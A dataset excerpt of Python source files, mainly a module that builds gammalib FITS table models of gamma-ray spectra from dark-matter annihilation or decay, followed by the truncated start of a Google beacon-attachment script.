id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
283611 | import gammalib
import math
import numpy as np
from ctadmtool.dmspectrum.dmspectra import dmspectrum
from ctadmtool.tools.misc import ValidValue , ValidString
from tqdm import tqdm
import warnings
ALLOWED_FERMIONS = ('Majorana', 'Dirac')
ALLOWED_CHANNELS = ('eL', 'eR', 'e',
'MuL', 'MuR', 'Mu', 'TauL', 'TauR', 'Tau',
'q', 'c', 'b', 't',
'WL', 'WT', 'W', 'ZL', 'ZT', 'Z', 'g', 'Gamma', 'h',
'Nue', 'NuMu', 'NuTau',
'Ve', 'VMu', 'VTau')
ALLOWED_CHANNELSNOEW = ('e','Mu','Tau','q','c','b','t','W','Z','g')
@ValidValue("_dfactor", min_val=1.e-40)
@ValidValue('_lifetime', min_val=1.e-40)
@ValidValue("_jfactor", min_val=1.e-40)
@ValidValue('_sigmav', min_val=1.e-40)
@ValidString('_delta', empty_allowed=False, options=ALLOWED_FERMIONS)
@ValidValue('_mmin', min_val=10.0)
@ValidValue('_mmax', max_val=1.e+5)
@ValidString('_srcname', empty_allowed=False)
class dmtable() :
    """
    Build a gammalib GModelSpectralTable (fits table-model) with the
    gamma-ray spectra produced by annihilation or decay of dark matter
    particles, for every allowed annihilation/decay channel.

    The actual spectrum values are delegated to a dmspectrum
    interpolator instance passed at construction time.
    """
    # Init
    def __init__(self, srcname, mmin, mmax, mpoints, dminterp, delta='Majorana',
        sigmav=3.6e-26, jfactor=1.e+19, lifetime=1.e+30, dfactor=1.e+19) :
        """
        Initialize the dmtable class
        Parameters:
        ----------
            srcname  : Name of the target or family targets
            mmin     : Min mass of dark matter candidate (GeV)
            mmax     : Max mass of dark matter candidate (GeV)
            mpoints  : Number of mass points to create the Fits table
            dminterp : dmspectrum class instance used as the spectrum
                       interpolator (avoids duplicating that code here)
            delta    : Parameter to describe if dark matter candidate
                       is a Majorana (delta=2) fermion or a
                       Dirac (delta=4) fermion
            sigmav   : Annihilation cross-section (in cm**3/s)
            jfactor  : Astrophysical factor in (GeV**2/cm**5)
            lifetime : Decay lifetime (in s)
            dfactor  : Astrophysical factor in (GeV/cm**2)
        """
        # Check that mmin < mmax; if not, swap the two values and warn
        if mmin > mmax :
            msg = ('\nI found that Minimum mass {0} '.format(mmin) +
                'is greater than Maximum mass {0}.\n'.format(mmax) +
                'Changing the order...')
            warnings.warn(msg, RuntimeWarning)
            m_min = mmax
            m_max = mmin
        else :
            m_min = mmin
            m_max = mmax
        # Initialize parameters of the dmtable instance
        self._srcname  = srcname
        self._sigmav   = sigmav
        self._jfactor  = jfactor
        self._lifetime = lifetime
        self._dfactor  = dfactor
        self._delta    = delta
        self._mmin     = m_min
        self._mmax     = m_max
        self._mpoints  = mpoints
        if not isinstance(dminterp, dmspectrum) :
            msg = 'dminterp must be an instance of dmspectrum class'
            raise TypeError(msg)
        else :
            self._dminterp = dminterp
        # Logarithmically spaced mass grid of the table model
        self._masses = self._marray(m_min, m_max, mpoints)
        # The set of channels depends on whether EW corrections are used
        if dminterp.hasEW :
            self._allowed_channels = ALLOWED_CHANNELS
        else :
            self._allowed_channels = ALLOWED_CHANNELSNOEW
        # GModelSpectralTable; filled by create_modeltable()
        self._model = None
        # Return
        return

    @property
    def sigmav(self) :
        """
        Return value of the annihilation cross-section (cm**3/s)
        used to compute the flux
        """
        # Return
        return self._sigmav

    @sigmav.setter
    def sigmav(self, sigmav) :
        """
        Set the value of Annihilation cross-section (in cm**3/s)
        used to compute the flux
        Parameters
        ----------
            sigmav : Annihilation cross-section (cm**3/s)
        """
        # Check that sigmav is greater than 1.e-40
        if sigmav < 1.e-40 :
            raise ValueError(('\nValue of annihilation cross-section ' +
                ' must be greater than 1.e-40.\n' +
                'This is just to avoid possible round errors'))
        # Set sigmav
        self._sigmav = sigmav
        # Return
        return

    @property
    def lifetime(self) :
        """
        Return value of the decay lifetime (s)
        used to compute the flux
        """
        # Return
        return self._lifetime

    @lifetime.setter
    def lifetime(self, tau_chi) :
        """
        Set the value of decay lifetime (in s)
        used to compute the flux
        Parameters
        ----------
            tau_chi : Decay lifetime (s)
        """
        # Check that the lifetime is greater than 1.e-40
        if tau_chi < 1.e-40 :
            raise ValueError(('\nValue of decay lifetime ' +
                ' must be greater than 1.e-40.\n' +
                'This is just to avoid possible round errors'))
        # Set lifetime
        self._lifetime = tau_chi
        # Return
        return

    @property
    def jfactor(self) :
        """
        Return the value of the astrophysical J factor (GeV**2/cm**5)
        used to compute the flux
        """
        # Return
        return self._jfactor

    @jfactor.setter
    def jfactor(self, jfactor) :
        """
        Set the value of the Astrophysical factor (GeV**2/cm**5)
        to compute the dm flux
        Parameters
        ----------
            jfactor : Astrophysical factor J (GeV**2/cm**5)
        """
        if jfactor < 1.e-40 :
            raise ValueError('\nValue of jfactor must be greater than 1.e-40.')
        # Set the jfactor
        self._jfactor = jfactor
        # Return
        return

    @property
    def dfactor(self) :
        """
        Return the value of the astrophysical D factor (GeV/cm**2)
        used to compute the flux
        """
        # Return
        return self._dfactor

    @dfactor.setter
    def dfactor(self, dfactor) :
        """
        Set the value of the Astrophysical factor (GeV/cm**2)
        to compute the dm flux
        Parameters
        ----------
            dfactor : Astrophysical factor D (GeV/cm**2)
        """
        # Validate like the jfactor setter (same lower bound as the
        # class-level @ValidValue decorator)
        if dfactor < 1.e-40 :
            raise ValueError('\nValue of dfactor must be greater than 1.e-40.')
        # Set the dfactor
        self._dfactor = dfactor
        # Return
        return

    @property
    def mmin(self) :
        """
        Return Minimum value mass (GeV) used to compute
        the dm flux
        """
        # Return
        return self._mmin

    @mmin.setter
    def mmin(self, m_min) :
        """
        Set the value of minimum mass (GeV) used to compute
        the dm flux
        """
        # Just check that the minimum mass is greater than
        # 10.0 GeV.
        if m_min < 10. :
            raise ValueError(('\nMinimum mass {0} GeV '.format(m_min) +
                'is below the allowed value (10GeV)'))
        # Set minimum mass
        self._mmin = m_min
        # Update masses
        mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
        self._masses = mvalues
        # Return
        return

    @property
    def mmax(self) :
        """
        Return Maximum value of mass (GeV) used to compute
        the dm flux
        """
        # Return
        return self._mmax

    @mmax.setter
    def mmax(self, m_max) :
        """
        Set the value of maximum mass (GeV) used to compute
        the dm flux
        """
        if m_max > 1.e+5 :
            raise ValueError(('\nMaximum mass {0} GeV '.format(m_max) +
                'is above the allowed value (1.e+5GeV)'))
        # Set maximum mass
        self._mmax = m_max
        # Update masses
        mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
        self._masses = mvalues
        # Return
        return

    @property
    def masses(self) :
        """
        Return the values of the mass array used to compute the spectrum
        """
        # Return
        return self._masses

    @masses.setter
    def masses(self, m_vals) :
        """
        Set the masses used to compute the spectrum
        Parameters
        ----------
        - m_vals : tuple with:
            - mmin    : Minimum mass (GeV)
            - mmax    : Maximum mass (GeV)
            - mpoints : Number of points to create the array
        """
        mmin, mmax, mpoints = m_vals
        # Check if mmin and mmax are valid
        if mmin < 10.0 :
            raise ValueError(('Mass {0} '.format(mmin) +
                'is lower than the allowed value 10.0'))
        if mmax > 1.e+5 :
            raise ValueError(('Mass {0} '.format(mmax) +
                'is greater than the allowed value 1.e+5'))
        # Create mass array
        mvalues = self._marray(mmin, mmax, mpoints)
        self._masses = mvalues
        # Return
        return

    @staticmethod
    def _marray(mmin, mmax, mpoints) :
        """
        Create list of masses to generate the fits table.
        The calculation is based on the number of points.
        The masses are computed assuming logarithmic spacing.
        """
        logmmin = np.log10(mmin)
        logmmax = np.log10(mmax)
        width   = (logmmax - logmmin)/(mpoints-1)
        masses  = []
        for index in range(mpoints) :
            masses.append(math.pow(10., logmmin+index*width))
        # Return
        return masses

    @property
    def delta(self) :
        """
        Return what kind of dark matter particle is
        used to compute the dm flux
        """
        # Return
        return self._delta

    @delta.setter
    def delta(self, delta) :
        """
        Set the value of delta to describe what kind of
        dark matter particle is used to compute the
        dm flux.
        Parameters
        ----------
            delta : String, either Majorana or Dirac
        """
        # Just to check that delta is valid
        if delta not in ALLOWED_FERMIONS :
            raise ValueError(('\nKind of Dark matter particle not ' +
                'supported.\nOptions are:{0}'.format(ALLOWED_FERMIONS)))
        # Set delta
        self._delta = delta
        # Return
        return

    @property
    def hasEW(self) :
        """
        Return whether EW corrections are included or not
        """
        # Return
        return self._dminterp.hasEW

    @hasEW.setter
    def hasEW(self, has_EW) :
        """
        Include EW corrections in computation of DM spectra
        """
        self._dminterp.hasEW = has_EW
        # Update the tuple of allowed channels
        if has_EW :
            self._allowed_channels = ALLOWED_CHANNELS
        else :
            self._allowed_channels = ALLOWED_CHANNELSNOEW
        # Return
        return

    @property
    def allowed_channels(self) :
        """
        Return tuple of allowed channels according to
        whether or not to include EW corrections in spectra
        """
        # Return
        return self._allowed_channels

    @property
    def tablemodel(self) :
        """
        Return GModelSpectralTable (None until create_modeltable runs)
        """
        # Return
        return self._model

    @property
    def process(self) :
        """
        Return dm process
        """
        # Return
        return self._dminterp.process

    @process.setter
    def process(self, process_vals) :
        """
        Set annihilation (anna) or decay process in dminterp.
        Also update the properties jfactor and sigmav for anna
        or dfactor and lifetime for decay
        Parameters
        ----------
            process_vals : (process, astrophysical factor,
                            parameter of interest)
        """
        # Extract values
        dmprocess = process_vals[0]
        astfactor = process_vals[1]
        paroi     = process_vals[2]
        # Check that process is valid
        VALID_PROCESSES = ['anna', 'decay']
        if dmprocess not in VALID_PROCESSES :
            msg = 'Valid options are: {0}'.format(VALID_PROCESSES)
            raise ValueError(msg)
        if astfactor < 1.e-40 or paroi < 1.e-40 :
            raise ValueError('\nParameters must be greater than 1.e-40.')
        # Update properties according to the selected process
        if dmprocess == 'anna' :
            self._jfactor = astfactor
            self._sigmav  = paroi
        elif dmprocess == 'decay' :
            self._dfactor  = astfactor
            self._lifetime = paroi
        self._dminterp.process = dmprocess
        # Return
        return

    @property
    def elist(self) :
        """
        Return list of energy values used to compute the spectrum
        """
        # Return
        return self._dminterp.energy

    @elist.setter
    def elist(self, evals) :
        """
        Update energy values used to compute the spectrum
            evals[0] --> emin
            evals[1] --> emax
            evals[2] --> epoints
        """
        # Check that emin and emax are ok.
        # Note that the minimum is 500 MeV: there is no meaning
        # to go to lower energies in the case of CTA
        if evals[0] < 5.0e-3 or evals[1] > 1.e+5 :
            raise ValueError('\nParameters outside of range')
        # Update properties
        self._dminterp.energy = evals
        # Return
        return

    @staticmethod
    def _norm_anna(sigmav, mass, delta, jfactor) :
        """
        Compute normalization of the dm flux compatible with gammalib
        Parameters
        ----------
            sigmav  : Value of annihilation cross-section (cm**3/s)
            mass    : Mass of dark matter particles (GeV)
            delta   : String to indicate if dark matter is a
                      Majorana or Dirac fermion
            jfactor : Astrophysical factor for annihilation
        Return
        ------
            norm : (1/[MeV * cm^2 * s])
        """
        d = 0.
        # Check delta
        if delta == 'Majorana' :
            d = 2.
        elif delta == 'Dirac' :
            d = 4.
        # Compute ppfactor
        ppfactor = sigmav / (d*4.*gammalib.pi*mass*mass)
        norm     = ppfactor * jfactor
        # Factor 1.0e-3 converts from GeV to MeV units
        return norm * 1.0e-3

    @staticmethod
    def _norm_decay(lifetime, mass, dfactor) :
        """
        Compute normalization of the dm flux compatible with gammalib
        Parameters
        ----------
            lifetime : Value of decay lifetime (s)
            mass     : Mass of dark matter particles (GeV)
            dfactor  : Astrophysical factor for decay
        Return
        ------
            norm : (1/[MeV * cm^2 * s])
        """
        # Compute ppfactor
        ppfactor = 1 / (4.*gammalib.pi*mass*lifetime)
        norm     = ppfactor * dfactor
        # Factor 1.0e-3 converts from GeV to MeV units
        return norm * 1.0e-3

    def create_modeltable(self) :
        """
        Create fits table with spectrum for all channels
        """
        # Get list of channel indices.
        # The number of energy points is obtained from the length of
        # the interpolator energy array (avoids accessing a private
        # member of the dmspectrum class)
        ch_indices = list(range(len(self._allowed_channels)))
        n_chs      = len(ch_indices)
        n_eng      = len(self._dminterp.energy)
        # Array with definitions of energy bins
        gemin = gammalib.GEnergy(self._dminterp.emin, 'GeV')
        gemax = gammalib.GEnergy(self._dminterp.emax, 'GeV')
        ebins = gammalib.GEbounds(n_eng, gemin, gemax)
        # Then create the GModelPar objects for mass and channel.
        # The default channel is hard coded, but we don't need to
        # select any particular channel at this moment: Tau is
        # just for initialization
        dmmass = gammalib.GModelPar('Mass', self._mmin, 1.0)
        dmmass.unit('GeV')
        tau_index = self._allowed_channels.index('Tau')
        dmchannel = gammalib.GModelPar('Channel', tau_index, 1.0)
        # Create the GSpectralTablePar objects
        par_mass    = gammalib.GModelSpectralTablePar(dmmass, self._masses)
        par_channel = gammalib.GModelSpectralTablePar(dmchannel, ch_indices)
        # Create the container GSpectralTablePars and append the pars
        pars = gammalib.GModelSpectralTablePars()
        pars.append(par_mass)
        pars.append(par_channel)
        # GNdarray to save the spectra
        spectra = gammalib.GNdarray(self._mpoints, n_chs, n_eng)
        # Filling the spectrum for every (mass, channel) pair
        desc = 'Computing {}-spectrum'.format(self._dminterp.process)
        for mindex, mass in tqdm(enumerate(self._masses),desc=desc,leave=False):
            # Change the value of the mass
            self._dminterp.mass = mass
            for cindex, thisch in enumerate(self._allowed_channels):
                # Modify the dmspectrum instance to match every
                # channel. The energy array does not change, and
                # whether EW corrections are included is already
                # encoded in the interpolator
                self._dminterp.channel = thisch
                dmspec = self._dminterp.spectra()
                for eindex in range(n_eng):
                    spectra[mindex, cindex, eindex] = dmspec[eindex]
        # Get ppfactor and normalization.
        # The normalization computed here is not strictly necessary:
        # it can be changed later during simulation or analysis steps
        # via GModelSpectralTable methods
        norm   = 0.0
        minval = 0.0
        maxval = 1.0e+20
        if self._dminterp.process == 'anna' :
            norm = self._norm_anna(self._sigmav, self._mmin,
                self._delta, self._jfactor)
        elif self._dminterp.process == 'decay' :
            norm = self._norm_decay(self._lifetime, self._mmin, self._dfactor)
        # Tuning the ModelSpectralTable:
        # the interpolation method of masses is set to logarithmic (1).
        # Mass and channel are fixed. In particular, it's mandatory
        # that the channel parameter is fixed
        model = gammalib.GModelSpectralTable(ebins, pars, spectra)
        model.table_par('Mass').method(1)
        model.table_par('Channel').method(0)
        model['Mass'].fix()
        model['Channel'].fix()
        model['Normalization'].value(norm)
        model['Normalization'].scale(1.0)
        model['Normalization'].range(minval, maxval)
        self._model = model
        # Return
        return

    def save(self) :
        """
        Save the DM table to a fits file named after process,
        source name and EW flag (existing file is overwritten)
        """
        process = self._dminterp.process
        ew      = int(self._dminterp.hasEW)
        name    = 'DMModel{0}{1}EW{2}.fits'.format(process, self._srcname, ew)
        self._model.save(name, True)
        return
@ValidValue("_dfactor", min_val=1.e-40)
@ValidValue('_lifetime', min_val=1.e-40)
@ValidValue("_jfactor", min_val=1.e-40)
@ValidValue('_sigmav', min_val=1.e-40)
@ValidString('_delta', empty_allowed=False, options=ALLOWED_FERMIONS)
@ValidValue('_mmin', min_val=10.0)
@ValidValue('_mmax', max_val=1.e+5)
@ValidString('_srcname', empty_allowed=False)
class dmtable_ch() :
    """
    Build a gammalib GModelSpectralTable (fits table-model) with the
    gamma-ray spectra produced by annihilation or decay of dark matter
    particles. The suffix 'ch' stands for single channel, so this class
    only creates table-models for one specific channel.
    """
    # Init
    def __init__(self, srcname, mmin, mmax, mpoints, dminterp,
        channel='Tau', delta='Majorana', sigmav=3.6e-26, jfactor=1.e+19,
        lifetime=1.e+30, dfactor=1.e+19) :
        """
        Initialize the dmtable_ch class
        Parameters:
        ----------
            srcname  : Name of the target or family targets
            mmin     : Min mass of dark matter candidate (GeV)
            mmax     : Max mass of dark matter candidate (GeV)
            mpoints  : Number of mass points to create the Fits table
            dminterp : dmspectrum class instance used as the spectrum
                       interpolator (avoids duplicating that code here)
            channel  : Annihilation/decay channel of the table
            delta    : Parameter to describe if dark matter candidate
                       is a Majorana (delta=2) fermion or a
                       Dirac (delta=4) fermion
            sigmav   : Annihilation cross-section (in cm**3/s)
            jfactor  : Astrophysical factor in (GeV**2/cm**5)
            lifetime : Decay lifetime (in s)
            dfactor  : Astrophysical factor in (GeV/cm**2)
        """
        # Check that mmin < mmax; if not, swap the two values and warn
        if mmin > mmax :
            msg = ('\nI found that Minimum mass {0} '.format(mmin) +
                'is greater than Maximum mass {0}.\n'.format(mmax) +
                'Changing the order...')
            warnings.warn(msg, RuntimeWarning)
            m_min = mmax
            m_max = mmin
        else :
            m_min = mmin
            m_max = mmax
        # Initialize parameters of the dmtable_ch instance
        self._srcname  = srcname
        self._sigmav   = sigmav
        self._jfactor  = jfactor
        self._lifetime = lifetime
        self._dfactor  = dfactor
        self._delta    = delta
        self._mmin     = m_min
        self._mmax     = m_max
        self._mpoints  = mpoints
        self._channel  = channel
        if not isinstance(dminterp, dmspectrum) :
            msg = 'dminterp must be an instance of dmspectrum class'
            raise TypeError(msg)
        else :
            self._dminterp = dminterp
        # Logarithmically spaced mass grid of the table model
        self._masses = self._marray(m_min, m_max, mpoints)
        # The set of channels depends on whether EW corrections are used
        if dminterp.hasEW :
            self._allowed_channels = ALLOWED_CHANNELS
        else :
            self._allowed_channels = ALLOWED_CHANNELSNOEW
        # Check if channel is valid
        if channel not in self._allowed_channels:
            msg = ('\nChannel {0} not found in '.format(channel) +
                'allowed channels. Options are: {0}'.format(
                    self._allowed_channels))
            raise ValueError(msg)
        # Update channel property of spectrum interpolator dminterp,
        # only if the channels are different
        if dminterp.channel != channel :
            dminterp.channel = channel
        # GModelSpectralTable; filled by create_modeltable()
        self._model = None
        # Return
        return

    @property
    def sigmav(self) :
        """
        Return value of the annihilation cross-section (cm**3/s)
        used to compute the flux
        """
        # Return
        return self._sigmav

    @sigmav.setter
    def sigmav(self, sigmav) :
        """
        Set the value of Annihilation cross-section (in cm**3/s)
        used to compute the flux
        Parameters
        ----------
            sigmav : Annihilation cross-section (cm**3/s)
        """
        # Check that sigmav is greater than 1.e-40
        if sigmav < 1.e-40 :
            raise ValueError(('\nValue of annihilation cross-section ' +
                ' must be greater than 1.e-40.\n' +
                'This is just to avoid possible round errors'))
        # Set sigmav
        self._sigmav = sigmav
        # Return
        return

    @property
    def lifetime(self) :
        """
        Return value of the decay lifetime (s)
        used to compute the flux
        """
        # Return
        return self._lifetime

    @lifetime.setter
    def lifetime(self, tau_chi) :
        """
        Set the value of decay lifetime (in s)
        used to compute the flux
        Parameters
        ----------
            tau_chi : Decay lifetime (s)
        """
        # Check that the lifetime is greater than 1.e-40
        if tau_chi < 1.e-40 :
            raise ValueError(('\nValue of decay lifetime ' +
                ' must be greater than 1.e-40.\n' +
                'This is just to avoid possible round errors'))
        # Set lifetime
        self._lifetime = tau_chi
        # Return
        return

    @property
    def jfactor(self) :
        """
        Return the value of the astrophysical J factor (GeV**2/cm**5)
        used to compute the flux
        """
        # Return
        return self._jfactor

    @jfactor.setter
    def jfactor(self, jfactor) :
        """
        Set the value of the Astrophysical factor (GeV**2/cm**5)
        to compute the dm flux
        Parameters
        ----------
            jfactor : Astrophysical factor J (GeV**2/cm**5)
        """
        if jfactor < 1.e-40 :
            raise ValueError('\nValue of jfactor must be greater than 1.e-40.')
        # Set the jfactor
        self._jfactor = jfactor
        # Return
        return

    @property
    def dfactor(self) :
        """
        Return the value of the astrophysical D factor (GeV/cm**2)
        used to compute the flux
        """
        # Return
        return self._dfactor

    @dfactor.setter
    def dfactor(self, dfactor) :
        """
        Set the value of the Astrophysical factor (GeV/cm**2)
        to compute the dm flux
        Parameters
        ----------
            dfactor : Astrophysical factor D (GeV/cm**2)
        """
        # Validate like the jfactor setter (same lower bound as the
        # class-level @ValidValue decorator)
        if dfactor < 1.e-40 :
            raise ValueError('\nValue of dfactor must be greater than 1.e-40.')
        # Set the dfactor
        self._dfactor = dfactor
        # Return
        return

    @property
    def mmin(self) :
        """
        Return Minimum value mass (GeV) used to compute
        the dm flux
        """
        # Return
        return self._mmin

    @mmin.setter
    def mmin(self, m_min) :
        """
        Set the value of minimum mass (GeV) used to compute
        the dm flux
        """
        # Just check that the minimum mass is greater than
        # 10.0 GeV.
        if m_min < 10. :
            raise ValueError(('\nMinimum mass {0} GeV '.format(m_min) +
                'is below the allowed value (10GeV)'))
        # Set minimum mass
        self._mmin = m_min
        # Update masses
        mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
        self._masses = mvalues
        # Return
        return

    @property
    def mmax(self) :
        """
        Return Maximum value of mass (GeV) used to compute
        the dm flux
        """
        # Return
        return self._mmax

    @mmax.setter
    def mmax(self, m_max) :
        """
        Set the value of maximum mass (GeV) used to compute
        the dm flux
        """
        if m_max > 1.e+5 :
            raise ValueError(('\nMaximum mass {0} GeV '.format(m_max) +
                'is above the allowed value (1.e+5GeV)'))
        # Set maximum mass
        self._mmax = m_max
        # Update masses
        mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
        self._masses = mvalues
        # Return
        return

    @property
    def masses(self) :
        """
        Return the values of the mass array used to compute the spectrum
        """
        # Return
        return self._masses

    @masses.setter
    def masses(self, m_vals) :
        """
        Set the masses used to compute the spectrum
        Parameters
        ----------
        - m_vals : tuple with:
            - mmin    : Minimum mass (GeV)
            - mmax    : Maximum mass (GeV)
            - mpoints : Number of points to create the array
        """
        mmin, mmax, mpoints = m_vals
        # Check if mmin and mmax are valid
        if mmin < 10.0 :
            raise ValueError(('Mass {0} '.format(mmin) +
                'is lower than the allowed value 10.0'))
        if mmax > 1.e+5 :
            raise ValueError(('Mass {0} '.format(mmax) +
                'is greater than the allowed value 1.e+5'))
        # Create mass array
        mvalues = self._marray(mmin, mmax, mpoints)
        self._masses = mvalues
        # Return
        return

    @staticmethod
    def _marray(mmin, mmax, mpoints) :
        """
        Create list of masses to generate the fits table.
        The calculation is based on the number of points.
        The masses are computed assuming logarithmic spacing.
        """
        logmmin = np.log10(mmin)
        logmmax = np.log10(mmax)
        width   = (logmmax - logmmin)/(mpoints-1)
        masses  = []
        for index in range(mpoints) :
            masses.append(math.pow(10., logmmin+index*width))
        # Return
        return masses

    @property
    def delta(self) :
        """
        Return what kind of dark matter particle is
        used to compute the dm flux
        """
        # Return
        return self._delta

    @delta.setter
    def delta(self, delta) :
        """
        Set the value of delta to describe what kind of
        dark matter particle is used to compute the
        dm flux.
        Parameters
        ----------
            delta : String, either Majorana or Dirac
        """
        # Just to check that delta is valid
        if delta not in ALLOWED_FERMIONS :
            raise ValueError(('\nKind of Dark matter particle not ' +
                'supported.\nOptions are:{0}'.format(ALLOWED_FERMIONS)))
        # Set delta
        self._delta = delta
        # Return
        return

    @property
    def hasEW(self) :
        """
        Return whether EW corrections are included or not
        """
        # Return
        return self._dminterp.hasEW

    @hasEW.setter
    def hasEW(self, has_EW) :
        """
        Include EW corrections in computation of DM spectra
        """
        self._dminterp.hasEW = has_EW
        # Update the tuple of allowed channels.
        # NOTE(review): the current channel is not re-validated against
        # the new tuple here -- presumably callers set channel afterwards
        if has_EW :
            self._allowed_channels = ALLOWED_CHANNELS
        else :
            self._allowed_channels = ALLOWED_CHANNELSNOEW
        # Return
        return

    @property
    def allowed_channels(self) :
        """
        Return tuple of allowed channels according to
        whether or not to include EW corrections in spectra
        """
        # Return
        return self._allowed_channels

    @property
    def channel(self) :
        '''
        Return channel used to compute the gamma-ray flux
        '''
        # Return
        return self._channel

    @channel.setter
    def channel(self, ch) :
        '''
        Set channel used to compute the dmspectrum.
        Also updates the channel parameter of the
        spectrum interpolator dminterp.
        If channel is not valid, raise value error
        '''
        # Check if channel is valid
        # (bug fix: the message used the undefined name `channel`
        # and listed the fermion types instead of the channels)
        if ch not in self._allowed_channels :
            msg = ('\nChannel {0} not found in '.format(ch) +
                'allowed channels. Options are: {0}'.format(
                    self._allowed_channels))
            raise ValueError(msg)
        # Set channel
        self._channel = ch
        # Update dminterp instance
        self._dminterp.channel = ch
        # Return
        return

    @property
    def tablemodel(self) :
        """
        Return GModelSpectralTable (None until create_modeltable runs)
        """
        # Return
        return self._model

    @property
    def process(self) :
        """
        Return dm process
        """
        # Return
        return self._dminterp.process

    @process.setter
    def process(self, process_vals) :
        """
        Set annihilation (anna) or decay process in dminterp.
        Also update the properties jfactor and sigmav for anna
        or dfactor and lifetime for decay
        Parameters
        ----------
            process_vals : (process, astrophysical factor,
                            parameter of interest)
        """
        # Extract values
        dmprocess = process_vals[0]
        astfactor = process_vals[1]
        paroi     = process_vals[2]
        # Check that process is valid
        VALID_PROCESSES = ['anna', 'decay']
        if dmprocess not in VALID_PROCESSES :
            msg = 'Valid options are: {0}'.format(VALID_PROCESSES)
            raise ValueError(msg)
        if astfactor < 1.e-40 or paroi < 1.e-40 :
            raise ValueError('\nParameters must be greater than 1.e-40.')
        # Update properties according to the selected process
        if dmprocess == 'anna' :
            self._jfactor = astfactor
            self._sigmav  = paroi
        elif dmprocess == 'decay' :
            self._dfactor  = astfactor
            self._lifetime = paroi
        self._dminterp.process = dmprocess
        # Return
        return

    @property
    def elist(self) :
        """
        Return list of energy values used to compute the spectrum
        """
        # Return
        return self._dminterp.energy

    @elist.setter
    def elist(self, evals) :
        """
        Update energy values used to compute the spectrum
            evals[0] --> emin
            evals[1] --> emax
            evals[2] --> epoints
        """
        # Check that emin and emax are ok.
        # The minimum is set to 500 MeV
        if evals[0] < 5.0e-3 or evals[1] > 1.e+5 :
            raise ValueError('\nParameters outside of range')
        # Update properties
        self._dminterp.energy = evals
        # Return
        return

    @staticmethod
    def _norm_anna(sigmav, mass, delta, jfactor) :
        """
        Compute normalization of the dm flux compatible with gammalib
        Parameters
        ----------
            sigmav  : Value of annihilation cross-section (cm**3/s)
            mass    : Mass of dark matter particles (GeV)
            delta   : String to indicate if dark matter is a
                      Majorana or Dirac fermion
            jfactor : Astrophysical factor for annihilation
        Return
        ------
            norm : (1/[MeV * cm^2 * s])
        """
        d = 0.
        # Check delta
        if delta == 'Majorana' :
            d = 2.
        elif delta == 'Dirac' :
            d = 4.
        # Compute ppfactor
        ppfactor = sigmav / (d*4.*gammalib.pi*mass*mass)
        norm     = ppfactor * jfactor
        # Factor 1.0e-3 converts from GeV to MeV units
        return norm * 1.0e-3

    @staticmethod
    def _norm_decay(lifetime, mass, dfactor) :
        """
        Compute normalization of the dm flux compatible with gammalib
        Parameters
        ----------
            lifetime : Value of decay lifetime (s)
            mass     : Mass of dark matter particles (GeV)
            dfactor  : Astrophysical factor for decay
        Return
        ------
            norm : (1/[MeV * cm^2 * s])
        """
        # Compute ppfactor
        ppfactor = 1 / (4.*gammalib.pi*mass*lifetime)
        norm     = ppfactor * dfactor
        # Factor 1.0e-3 converts from GeV to MeV units
        return norm * 1.0e-3

    def create_modeltable(self) :
        """
        Create fits table with spectrum for specific channel
        """
        # Number of points in energy array
        n_eng = len(self._dminterp.energy)
        # Array with definitions of energy bins.
        # The min and max values are encapsulated in the
        # dm spectrum interpolator dminterp
        gemin = gammalib.GEnergy(self._dminterp.emin, 'GeV')
        gemax = gammalib.GEnergy(self._dminterp.emax, 'GeV')
        ebins = gammalib.GEbounds(n_eng, gemin, gemax)
        # Then create the GModelPar objects for mass
        dmmass = gammalib.GModelPar('Mass', self._mmin, 1.0)
        dmmass.unit('GeV')
        # Create the GSpectralTablePar objects
        par_mass = gammalib.GModelSpectralTablePar(dmmass, self._masses)
        # Create the container GSpectralTablePars and append the pars
        pars = gammalib.GModelSpectralTablePars()
        pars.append(par_mass)
        # GNdarray to save the spectra
        spectra = gammalib.GNdarray(self._mpoints, n_eng)
        # Filling the spectrum for every mass point
        desc = 'Computing {}-spectrum'.format(self._dminterp.process)
        for mindex, mass in tqdm(enumerate(self._masses),desc=desc,leave=False):
            # Change the value of the mass
            self._dminterp.mass = mass
            dmspec = self._dminterp.spectra()
            for eindex in range(n_eng):
                spectra[mindex, eindex] = dmspec[eindex]
        # Get ppfactor and normalization.
        # The normalization computed here is not strictly necessary:
        # it can be changed later during simulation or analysis steps
        # via GModelSpectralTable methods
        norm   = 0.0
        minval = 0.0
        maxval = 1.0e+20
        if self._dminterp.process == 'anna' :
            norm = self._norm_anna(self._sigmav, self._mmin,
                self._delta, self._jfactor)
        elif self._dminterp.process == 'decay' :
            norm = self._norm_decay(self._lifetime, self._mmin, self._dfactor)
        # Tuning the ModelSpectralTable:
        # the interpolation method of masses is set to logarithmic (1).
        # Mass is a fixed parameter
        model = gammalib.GModelSpectralTable(ebins, pars, spectra)
        model.table_par('Mass').method(1)
        model['Mass'].scale(1.)
        model['Mass'].fix()
        model['Normalization'].value(norm)
        model['Normalization'].scale(1.0)
        model['Normalization'].range(minval, maxval)
        self._model = model
        # Return
        return

    def save(self) :
        """
        Save the DM table to a fits file named after process, source
        name, EW flag and channel (existing file is overwritten)
        """
        process = self._dminterp.process
        ew      = int(self._dminterp.hasEW)
        src     = self._srcname
        ch      = self._channel
        name    = 'DMModel{0}{1}EW{2}Ch{3}.fits'.format(process, src, ew, ch)
        self._model.save(name, True)
        return
| StarcoderdataPython |
1793757 | #!/usr/bin/env python
# Copyright (C) 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import pbapi
# Attachment JSON fields that must be present for a valid
# Nearby Notifications attachment.
REQUIRED_FIELDS = [
    'url',
    'title',
    'description'
]
# Fields that are only recommended; absence produces a warning,
# not an error (currently none).
RECOMMENDED_FIELDS = [
]
# Namespaced attachment type used by Nearby Notifications.
NEARBY_NS_TYPE = 'com.google.nearby/en'
# Combined title+description length limits: exceeding the ideal
# max warns, exceeding the hard max aborts.
